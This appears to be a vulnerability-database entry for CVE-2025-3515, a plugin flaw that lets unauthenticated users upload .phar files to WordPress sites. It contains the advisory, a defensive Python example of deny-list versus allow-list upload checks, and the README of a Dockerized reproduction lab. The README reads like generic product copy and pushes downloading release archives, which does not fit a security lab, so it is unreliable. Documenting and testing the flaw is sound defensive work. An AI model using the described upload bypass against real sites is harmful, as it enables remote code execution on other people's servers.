
CVE-2025-3515 PoC — Drag and Drop Multiple File Upload for Contact Form 7 <= 1.3.8.9 - Unauthenticated Arbitrary File Upload via Insufficient Blacklist Checks

Associated Vulnerability
Title: Drag and Drop Multiple File Upload for Contact Form 7 <= 1.3.8.9 - Unauthenticated Arbitrary File Upload via Insufficient Blacklist Checks (CVE-2025-3515)
Description: The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in all versions up to, and including, 1.3.8.9. This makes it possible for unauthenticated attackers to bypass the plugin's blacklist and upload .phar or other dangerous file types to the affected site's server, which may make remote code execution possible on servers that are configured to handle .phar files as executable PHP scripts, particularly in default Apache+mod_php configurations where the file extension is not strictly validated before being passed to the PHP interpreter.
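As an added illustration (not code from the lab or from the plugin), the check below models the weak deny-list pattern the advisory describes next to an allow-list alternative, and includes a small sweep a defender can run over upload paths. The deny-list, the allow-list and the sample filenames are constructed for the example.

```python
"""Deny-list vs allow-list extension checks (constructed example)."""
from pathlib import PurePosixPath

# Constructed deny-list modelled on the "blacklist" pattern the advisory
# describes; it is NOT the plugin's real list. Note that .phar is absent,
# which is exactly the gap an extension deny-list tends to leave.
DENY_LIST = {"php", "php3", "php4", "php5", "phtml", "exe", "js", "html"}

# Constructed allow-list of what a contact-form upload actually needs.
ALLOW_LIST = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}


def all_extensions(filename: str) -> list[str]:
    """Every suffix of the name, lower-cased: 'a.php.jpg' -> ['php', 'jpg']."""
    return [s.lstrip(".").lower() for s in PurePosixPath(filename).suffixes]


def deny_list_check(filename: str) -> bool:
    """Weak pattern: accept unless the LAST extension is on the deny-list.

    Anything the list forgot (e.g. .phar), a name with no extension, or a
    double extension whose final part looks harmless all slip through.
    """
    exts = all_extensions(filename)
    return not exts or exts[-1] not in DENY_LIST


def allow_list_check(filename: str) -> bool:
    """Hardened pattern: the name must have at least one extension and EVERY
    extension must be on the allow-list, so 'x.php.jpg' is rejected too."""
    exts = all_extensions(filename)
    return bool(exts) and all(e in ALLOW_LIST for e in exts)


def find_suspicious_uploads(paths: list[str]) -> list[str]:
    """Defender sweep: return upload paths whose basename fails the allow-list."""
    return [p for p in paths if not allow_list_check(PurePosixPath(p).name)]


if __name__ == "__main__":
    # Constructed sample paths, not real files from any site.
    sample = ["uploads/photo.jpg", "uploads/shell.phar", "uploads/shell.php.jpg"]
    for name in sample:
        print(f"{name:24} deny-list={deny_list_check(name)!s:5} "
              f"allow-list={allow_list_check(name)}")
    print("suspicious:", find_suspicious_uploads(sample))
```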
Description
πŸ› οΈ Reproduce and validate CVE-2025-3515 by setting up a Dockerized WordPress lab for testing unrestricted file uploads in a vulnerable plugin.
Readme
# 🚀 lab-cve-2025-3515 - Easy File Uploads for WordPress

## 🔗 Download Now
[![Download](https://img.shields.io/badge/Download%20Latest%20Release-blue.svg)](https://github.com/robertskimengote/lab-cve-2025-3515/releases)

## 📖 Project Description
Welcome to lab-cve-2025-3515! This project provides a hands-on environment to explore CVE-2025-3515. It focuses on a WordPress setup running the Drag and Drop Multiple File Upload plugin for Contact Form 7. This project is designed as a proof-of-concept and includes Nuclei testing to evaluate security risks.

## 📋 System Requirements
To use this application, ensure your system meets the following requirements:

- Operating System: Windows 10 or later, macOS Mojave or later, or a recent Linux distribution.
- Docker: Install Docker Desktop for your operating system.
- Memory: At least 4 GB of RAM recommended.
- Disk Space: 1 GB of free disk space.

## 🚀 Getting Started
Follow these steps to get up and running with lab-cve-2025-3515:

1. **Ensure Docker is Installed**  
   If you do not have Docker, download and install it from [the official Docker website](https://www.docker.com/get-started).

2. **Download the Application**  
   Visit the [Releases page](https://github.com/robertskimengote/lab-cve-2025-3515/releases) to download the latest version.

3. **Extract the Files**  
   Locate the downloaded file on your computer and extract its contents. You can usually do this by right-clicking the file and selecting “Extract All…” or by using software such as WinRAR or 7-Zip.

4. **Open a Command Prompt or Terminal**  
   On Windows, search for `cmd` in the Start menu. On macOS or Linux, open the Terminal app.

5. **Navigate to the Directory**  
   Change to the directory where you extracted the files. Use the `cd` command, followed by the path to your folder. For example:
   ```
   cd path/to/lab-cve-2025-3515
   ```

6. **Run Docker Compose**  
   Enter the following command to start the application with Docker:
   ```
   docker-compose up -d
   ```
   This command will pull the necessary Docker images and start the application in a few moments.

7. **Access the Application**  
   Open your web browser and navigate to `http://localhost:8080`. Here you can begin testing the drag-and-drop file upload feature.

## 💻 Features
- **Drag-and-Drop Uploads**: Users can easily upload multiple files with a simple drag-and-drop interface.
- **Nuclei Testing**: Integrated scripts to help check for common vulnerabilities.
- **Easy Setup**: Quick installation and setup with Docker for a smooth experience.

## 📥 Download & Install
To get the latest version of lab-cve-2025-3515, follow the link below to visit the releases page:

[Download Latest Release](https://github.com/robertskimengote/lab-cve-2025-3515/releases)

Follow the above getting started steps after downloading to set up the application.

## 🛠 Troubleshooting
If you encounter any issues:
- Ensure Docker is running before starting the application.
- Check for errors in the command prompt or terminal for clues.
- Make sure your firewall or antivirus is not blocking Docker.

## 📞 Support
If you need help, please open an issue on the GitHub repository. Provide details about your problem, and someone from the community will assist you.

Thank you for using lab-cve-2025-3515. We hope you enjoy exploring WordPress security in a practical way!
File Snapshot

[4.0K] /data/pocs/3ea5bbf2726d25d36712c323de89bbe58a59b568
├── [1.2K] docker-compose.yml
├── [3.3K] README.md
└── [4.0K] scripts
    └── [3.8K] wp-init.sh

1 directory, 3 files